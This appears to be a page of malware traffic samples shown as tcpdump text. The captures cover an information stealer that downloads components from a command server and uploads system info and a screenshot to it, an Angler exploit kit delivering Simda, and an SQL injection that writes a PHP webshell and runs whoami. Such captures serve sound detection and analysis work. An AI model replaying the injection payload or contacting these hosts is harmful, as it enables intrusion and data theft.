Text Example

POST /gate/log.php 31.210.171.200 Malware Dropper Trojan Downloader PCAP File Download Traffic Sample

2019-05-29 23:39:48.912311 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3097589712:3097590130, ack 2503829794, win 16425, length 418: HTTP: GET /1.exe HTTP/1.1
E…..@…..
.
.
.
.. .P..w..=i”P.@)….GET /1.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-29 23:39:49.588931 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 109501:110961, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
.
.
..P. .?….yrP…….@……….t…..H.F………82A……..F…..”A..7….X.F…..”A..&….d.F.3.ZYYd..h..A………]…d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F.p…d.F.q…d.F.r…d.F.s…d.F.t…d.F.u…
d.F.v…d.F.w…d.F.x…d.F.y…d.F.z…d.F.{…d.F.|…d.F.}…d.F.~…d.F…..d.F.`…d.F.a…d.F.b…d.F.c…d.F.d…d.F.e…d.F.f…d.F.g…d.F.h…d.F.i…d.F.j…d.F.k…d.F.l…d.F.m…d.F.n…d.F.o…d.F.P…d.F.Q…d.F.R…d.F
.S…d.F.T…d.F.U…d.F.V…d.F.W…d.F.X…d.F.Y…d.F.Z…d.F.[…d.F….d.F.]…d.F.^…d.F._…d.F.@…d.F.A…d.F.B…d.F.C…d.F.D…d.F.E…d.F.F…d.F.G…d.F.H…d.F.I…d.F.J…d.F.K…d.F.L…d.F.M…d.F.N…d.F.O…d.F.0.
..d.F.1…d.F.2…d.F.3…d.F.4…d.F.5…d.F.6…d.F.7…d.F.8…d.F.9…d.F.:…d.F.;…d.F.<…U..3.Uh..A.d.0d. ….F.3.ZYYd..h..A…6…..]….-..F…..A…TColor……….@.4.A………………………..4.A…..@w@..;@..;@..;@.. <@..;@.(9@.D9@..9@..EInvalidGraphic..A………………………….A…..@w@..;@..;@..;@..<@..;@.(9@.D9@..9@..EInvalidGraphicOperation.@…A.. TFontPitch………..A. fpDefault fpVariable.fpFixed.Graphics…A. TFontName…A…TFontCharset………. .A.. TFontStyle………..A..fsBold.fsItalic.fsUnderline.fsStrikeOut.Graphics..p.A…TFontStyles…A…..A.. TPenStyle………..A..psSolid.psDash.psDot psDashDot.psDashDotDot.psClear.psInsideFrame.Graphics…A…TPenMode………..A..p mBlack.pmWhite.pmNop.pmNot.pmCopy pmNotCopy.pmMergePe 2019-05-29 23:39:49.590576 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 173741:175201, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
E…..@…..
.
……$.P>….e..P.@)….POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 31.210.171.200

2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
E…..@…..
.
……$.P>….e..P.@).2..params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.o@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{“url”:”http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate”,”attachment_url”:”http://31.210.171.200/gate/sqlite3.dll”,”libraries”:”http://31.210.171.200/gate/libs.zip”,”ip”:”73.135.186.44″,”config”:{“masks”:null,”loader_urls”:null}}
0

2019-05-29 23:40:01.027541 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.p@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{“url”:”http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate”,”attachment_url”:”http://31.210.171.200/gate/sqlite3.dll”,”libraries”:”http://31.210.171.200/gate/libs.zip”,”ip”:”73.135.186.44″,”config”:{“masks”:null,”loader_urls”:null}}

2019-05-29 23:40:01.135113 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 2907559582:2907559879, ack 1455228641, win 16425, length 297: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..Q..@….Q
.
……%.P.M..V…P.@)i…GET /gate/sqlite3.dll HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:03.662144 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 297:591, ack 917003, win 65335, length 294: HTTP: GET /gate/libs.zip HTTP/1.1
E..N..@….V
.
……%.P.M..V…P..7B…GET /gate/libs.zip HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:05.273384 IP 31.210.171.200.80 > 10.1.10.162.49189: Flags [P.], seq 3744744:3745578, ack 591, win 245, length 834: HTTP
E .j..@.4…….
.
..P.%V...M..P…8P……..znN..i..(..8G….$……. …G.).api-ms-win-core-file-l2-1-0.dll . ………d0.^....R^%.....R^%....PK...........znNB.p.a(..8G..!.$....... ...Z.*.api-ms-win-core-handle-l1-1-0.dll . .........nW.^…..^%……^%….PK………..znN ..q.)..8G….$……. ….?.api-ms-win-core-heap-l1-1-0.dll
. ………nW.^...G._%....G._%....PK...........znN...##'...E..&.$....... ...:i*.api-ms-win-core-interlocked-l1-1-0.dll . ..........~.^…y.%….y.%….PK………..znNL…J)..8I..(.$……. …...api-ms-win-core-libraryloader-l1-1-0.dll . ……….~.^.....%……%....PK...........znN.....+..8Q..'.$....... ...1.*.api-ms-win-core-localization-l1-2-0.dll . ............^….N%.....N%….PK………..znN1….)..8I..!.$……. …?..api-ms-win-core-memory-l1-1-0.dll
. …………^.....%……`%….PK……:.:.t…..+…
2019-05-29 23:40:14.608543 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 345:689, ack 567, win 16283, length 344: HTTP: POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
E….a@…..
.
……$.P>..p.e..P.?…..POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 63918
Host: 31.210.171.200

2019-05-29 23:40:15.012041 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 63469:64607, ack 567, win 16283, length 1138: HTTP
E…..@…..
.
……$.P>….e..P.?.f…….8..b..Hl
.giT…BX:..D..7Y%3.4
…~$Z.8….K.u6.T………H….0}………….](..J.wK..b.Is…..@..}……….}o…..h..j..HP.JT.”..’B.A_u.hn”..S…;..R;..!.
-.fual[.MZ.L.qn.W.s.9.t=….C..S.=…@.M…fW4,w..4y.d-…/…….T..bf.2M…….eWoh…,./….;?+.S.PP.C...I.........K....[ RM.q. jTx.x... 8:W<!.+..j.4..(....W...."..O.......zD^.].....[..i..F.=.B..0.1.>..1..'...J.........0V..5.. c..._..3..>_.../ ..+N..X...v.H..R.....{I,..u..Z.^..\.E.$. ~...[5. ^o...P.bY.h.......w...$+.~t..57.0g...e.V%Q.R..M3..fm-1...]o+.x.F....E....W.......R.W.(..|.......<b.8..}7..:.>...srt6.r.....B.. U?V.$y.{..{..(..7.....r&%..u)D.V.C]..." ..y...&]7......@.%t&.{W. UZZ..#.....K.N..N@.;....o{...W.yl..E>.xT.D.^._...'9.p.Qw.?.....1V=..M...{W.vr)Tg.....Sp...g.....+."..............e...U...{...D0iZ...,.... ...].G2.......K …#….E.l.]..UN.v)……W gt.c..f}.Q….]..)6.…]..0………Fi.{ 4a&K……..6#…….nK.’.;……U..Z……e.|.Yb…’….z…..GVRI.F.8…PK………….NF.i……….. ……. …….System Info.txtUT….4.\PK………….N….Z…….
. ……. …….screen.pngUT….4.\PK…………..n…..
–Jfbvjwj3489078yuyetu–
2019-05-29 23:40:15.573069 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 567:793, ack 64607, win 1252, length 226: HTTP: HTTP/1.1 200 OK
E .
..@.4…….
.
..P.$.e..>..vP….v..HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

d
true”success”
0

Angler Exploit Kit EK Deliver Simda Malware Banking Trojan PCAP file download traffic sample

2015-03-27 11:14:44.276370 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(.A@….O..z”..D..).P.Cy…..P………….
2015-03-27 11:14:44.283482 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 1:356, ack 1, win 256, length 355: HTTP: GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
E….K@…….z”..D..).P.Cy…..P….;..GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: [[[[[[[[[ redacted ]]]]]]]]]]
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive

2015-03-27 11:14:44.539699 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], ack 356, win 123, length 0

2015-03-27 11:14:46.115369 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 95637, win 256, length 0
E..(..@…….z”..D..).P.C{…5 P…y………
2015-03-27 11:14:47.983190 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 356:767, ack 95637, win 256, length 411: HTTP: GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
E…..@…….z”..D..).P.C{…5 P…Ba..GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://kiyoshi.noahsbootandshoerepair.com/closers_retrenchment_delineation/6715645798
x-flash-version: 13,0,0,182
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive


2015-03-27 11:14:48.180800 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(..@….v..z”..D..6.P…5..BDP….”……..
2015-03-27 11:14:48.181788 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [P.], seq 1:133, ack 1, win 256, length 132: HTTP: GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
E…..@…….z”..D..6.P…5..BDP…….GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
Connection: Keep-Alive
Host: kiyoshi.noahsbootandshoerepair.com

2015-03-27 11:14:48.207298 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], seq 95637:97004, ack 767, win 131, length 1367: HTTP: HTTP/1.1 200 OK
E….&@.2.X…D…z”.P.)..5 .C|.P…e…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 27 Mar 2015 15:14:48 GMT
Content-Type: application/x-shockwave-flash

Content-Length: 52272

2015-03-27 11:14:52.508197 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [.], ack 1, win 256, length 0
E..(..@….[..z”.q…C.P=.,.u..RP….a……..
2015-03-27 11:14:52.509414 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [P.], seq 1:101, ack 1, win 256, length 100: HTTP: POST /timezone/0/0 HTTP/1.1
E…..@…….z”.q…C.P=.,.u..RP…I#..POST /timezone/0/0 HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.earthtools.org

2015-03-27 11:14:52.845296 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [.], ack 101, win 115, length 0
E..(7E@./.&..q….z”.P.Cu..R=.,iP..s….
2015-03-27 11:14:52.845577 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [P.], seq 1:696, ack 101, win 115, length 695: HTTP: HTTP/1.1 200 OK
E…7F@./.#..q….z”.P.Cu..R=.,iP..s….HTTP/1.1 200 OK

Date: Fri, 27 Mar 2015 15:14:52 GMT

2015-03-27 11:14:53.309622 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [.], ack 1, win 256, length 0
E..(..@…k…z”.%8..D.P/……SP…O………
2015-03-27 11:14:53.310410 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [P.], seq 1:126, ack 1, win 256, length 125: HTTP: POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
E…..@…j…z”.%8..D.P/……SP…X…POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.ecb.europa.eu

2015-03-27 11:14:53.478277 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], ack 126, win 457, length 0
E..(..@.9..F.%8…z”.P.D…S/…P…N…
2015-03-27 11:14:53.578255 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], seq 1:1368, ack 126, win 457, length 1367: HTTP: HTTP/1.1 200 OK
E…..@.9….%8…z”.P.D…S/…P…f…HTTP/1.1 200 OK

Server: Apache/2.2.3 (Linux/SUSE)

2015-03-27 11:14:58.577462 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….{..z”U.h..L.P.B.~6t..P…Ik……..
2015-03-27 11:14:58.578833 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..L.P.B.~6t..P….Y..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 216
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:14:58.579133 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 136:352, ack 1, win 256, length 216: HTTP
E…..@…….z”U.h..L.P.B..6t..P…k…SNE1dax2kTrCO0/dykZ+x8JvoeshsqxF8Bud4at1aDiBWU9qB6+uhOMFH98SexCc+vJywoAb8HQv8VDbLgLc25bZvceJUzuvnAqW58q0Pwbl5Z2luX50C3YR+Ef3gJUBFHY5k6LtQ0Uxou9+4TQEZzORJaqZn7WT9wqKE1eM8LYMnmPmnpobOT6M3r+PF5oJnTmoAQ1EthyxMm7LjPYf2g==

2015-03-27 11:14:58.778906 IP 85.25.104.159.80 > 192.168.122.34.49228: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:00.349286 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….@..z”U.h..N.P…H.1..P….i……..
2015-03-27 11:15:00.350212 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…H.1..P….R..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 172
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:00.350542 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 136:308, ack 1, win 256, length 172: HTTP
E…..@…….z”U.h..N.P…..1..P…….YD4viggOIh++07v2Um1gIx11St/8XC8saF5uX0YI4AMVOHQ25cUjc+t23u3BZI27fiaqpkXY6wVteS6MqFLJlvHwM6fGGZVitbFgc8uerOJBrGG5iaFm5jNsDn5NWX3yyd0SwE47HcjkQ1DdnT7on0O8tT20+FuDVEr4npZm0eE=

2015-03-27 11:15:00.643584 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:03.031960 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 513599, win 1368, length 0
E..(..@….K..z”U.h..N.P…{.9..P..X……….
2015-03-27 11:15:03.227353 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 308:443, ack 513599, win 1368, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…{.9..P..X….POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 256
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:03.227511 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 443:699, ack 513599, win 1368, length 256: HTTP
E..(..@….I..z”U.h..N.P…..9..P..X….GpbZQGaQgmfu/Eh0mvebAJPknXzYE1Vhzceud0DQnHPICCkYG2flJ1aMWtq5BMcqrPr7wo7Fr53uEdowJXndCecd5Aj+eFv4Wsy43MaZDqFqB2/ld1bLXKa8U5EUlr8hLOsU8Q/e3pN/wf2SWbmmm5Rci6Hw1izzlJ/rY8zpaDl3n3E2sBtF6EX0+M1Eu4cE82G4ZcE3qY2Ld94kApgQVjW/Wu5p26YOwUZB2mTcGnM0AT0qyJzKE77lTaBJkHH1

2015-03-27 11:15:03.427513 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 443, win 140, length 0

2015-03-27 11:15:09.727441 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [.], ack 1, win 256, length 0
E..(..@…….z”…..Y.P…Gv.”.P………….
2015-03-27 11:15:09.727832 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [P.], seq 1:407, ack 1, win 256, length 406: HTTP: POST /news.php HTTP/1.0
E…..@…….z”…..Y.P…Gv.”.P…….POST /news.php HTTP/1.0
Host: fasion.arunthati.co.uk
Accept: /
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 698
Content-Type: application/octet-stream

2015-03-27 11:15:21.224812 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 834:1562, ack 742017, win 2002, length 728: HTTP
E…..@…….z”U.h..N.P…..=.GP…….GMXiXd49B5iwJApbnju5S7TSL4CBU0EaU8l0WQKCbWg7hAyhzQilFMKgOwfKOy6G0/g37ipDdpYCEc8PJiUaJv+IFR1a1HXiPDWzFglXeTnP7pjbGUKS9K0PXA1Uo1UZW6VEoKRn+ZuxvM3BRRdgzEM5CkIH42ZpivDhVkCJ4P6Fqp+v1Uz2f9aZgRrnxA62Gds9itsbdKPYGT5K1fBQ6Wj0DQpkzb8c+eC00w5gKkNTQFDdq12qhpnydU5RL3j05yepKyu42ZnRDyd8UL8nKYIX6cvW5XczXGHFk1egZtjW++YmsVW0A4c5mpPT+PRLb9keLQRqWKcLW+RCozgBstim7ha1Uxrer1RcT/FG+UUrzkybT57eDfTeZQJLRsti4ahtlgyCqMDCmACszLGlxrcK0xwFAoZ40HHqwL561H815gEsuwcrzrE/C1t2quC9AHtRWPE4jgy8VMFRRJ1EQzjBxNCayGsFGb+V/qvImKrK4hic42Q+32icspNkz36X6+bgARY0aQhQkru0lGh6e88mNvt+EIpim5UJDxgGHDpdT5KPK8ZNEC66aHNcieJgnUnXspdClizeGvuZ7TUCgWey/VOnkedLfJQrIgWunOqVTEQzpJZrBH1px1fajjriHVCy7aj+KcF2C1MLibl1xptPqfKNinoKDEG3SPjZiHkj5rwFy+bP6AcEGER4/TYvrUovM6nBajbHIQF3C7Iezw==

2015-03-27 11:15:21.368855 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 834, win 156, length 0

2015-03-27 11:18:03.853669 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( ‘@…….z”N.k…P..;x.R..P…)………
2015-03-27 11:18:03.854165 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… (@….#..z”N.k…P..;x.R..P….x..GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:04.090363 IP 85.25.107.67.80 > 192.168.122.34.49245: Flags [S.], seq 307298518, ack 567770301, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.0.D.U.kC..z”.P.].Q..!.|…r……..W…….
2015-03-27 11:18:04.090742 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [.], ack 1, win 256, length 0
E..( )@…….z”U.kC.].P!.|..Q..P…AC……..
2015-03-27 11:18:04.091262 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [P.], seq 1:174, ack 1, win 256, length 173: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… *@…….z”U.kC.].P!.|..Q..P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: sandsofafrica.net

2015-03-27 11:18:04.218709 IP 162.244.34.133.80 > 192.168.122.34.49246: Flags [S.], seq 2988324121, ack 1071872369, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.3.<…”…z”.P.^..5.?.yq..r……..W……. 2015-03-27 11:18:04.219113 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( +@….`..z”..”..^.P?.yq..5.P…MT……..
2015-03-27 11:18:04.219642 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [P.], seq 1:171, ack 1, win 256, length 170: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… ,@…….z”..”..^.P?.yq..5.P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: koreandust.com

2015-03-27 11:18:32.826046 IP 192.168.122.34.49263 > 136.243.241.27.80: Flags [P.], seq 1:469, ack 1, win 64249, length 468: HTTP: GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
E… .@…:n..z”…..o.P..N..<1.P….w..GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in/?22504744544b4d4e4356434c5643564b0c414d4f
x-flash-version: 13,0,0,182
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in
Connection: Keep-Alive


2015-03-27 11:18:33.183843 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( .@….>..z”N.k..q.P7AB.ZEr.P………….
2015-03-27 11:18:33.184137 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… .@…….z”N.k..q.P7AB.ZEr.P…)…GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:33.217857 IP 192.168.122.34.52660 > 224.0.0.252.5355: UDP, length 22
E..2 ……4..z”…………^…………wpad…..
2015-03-27 11:18:33.280227 IP 136.243.241.27.80 > 192.168.122.34.49264: Flags [.], ack 552, win 15400, length 0
E..(..@.3………z”.P.p.%..}X-P.<(.n..

2015-03-27 11:18:33.280608 IP 136.243.241.27.80 > 192.168.122.34.49263: Flags [.], seq 12518:13885, ack 469, win 15544, length 1367: HTTP

2015-03-27 11:18:35.340582 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( .@…….z”..”..r.P…..%..P………….
2015-03-27 11:18:35.340943 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [P.], seq 1:326, ack 1, win 256, length 325: HTTP: GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
E..m .@….v..z”..”..r.P…..%..P…g…GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
Accept: /
Referer: http://newblackfridayads.com/search.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: koreandust.com
Connection: Keep-Alive

Webshell shell.php Command Access SSH Server PCAP Analysis File Download

2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, options [nop,nop,TS val 769026432 ecr 738855], length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1
E…XA@.?……2
..d…P…f{J.I…..F…..
-.i…F’GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.199573 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [.], ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 0
E..4.a@.@…
..d…2.P..{J.I……………
..F(-.i.
2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 995: HTTP: HTTP/1.1 200 OK
E….b@.@.|.
..d…2.P..{J.I……………
..F(-.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-vType: text/html

2018-10-14 12:34:34.210976 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 334:545, ack 996, win 244, options [nop,nop,TS val 769026434 ecr 738856], length 211: HTTP: GET /docs/shell.php?cmd=whoami HTTP/1.1
E…XC@.?……2
..d…P….{J.,………..
-.i…F(GET /docs/shell.php?cmd=whoami HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

